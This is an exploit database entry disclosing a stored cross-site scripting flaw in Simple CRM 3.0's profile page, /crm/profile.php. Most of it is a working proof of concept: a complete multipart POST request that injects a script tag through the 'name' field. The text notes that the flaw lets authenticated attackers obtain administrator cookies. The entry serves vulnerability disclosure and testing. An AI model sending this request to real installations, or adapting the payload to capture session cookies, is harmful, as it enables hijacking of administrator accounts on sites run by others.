Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)

2021-06-21
ID: 104496
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 20/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage: https://phpgurukul.com/
# Software Link:   https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies.

Vunlerable page: /crm/profile.php

POC:
----
POST /crm/profile.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------386571683933745493952831205283
Content-Length: 779
Origin: http://localhost
Connection: close
Referer: http://localhost/crm/profile.php
Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1
Upgrade-Insecure-Requests: 1

-----------------------------386571683933745493952831205283
Content-Disposition: form-data; name="name"
<script>alert('xss')</script>
-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="alt_email"

-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="phone"
0123456789

-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="gender"
m

-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="address"

-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="update"
Update

-----------------------------386571683933745493952831205283--
1-4-2 (www02)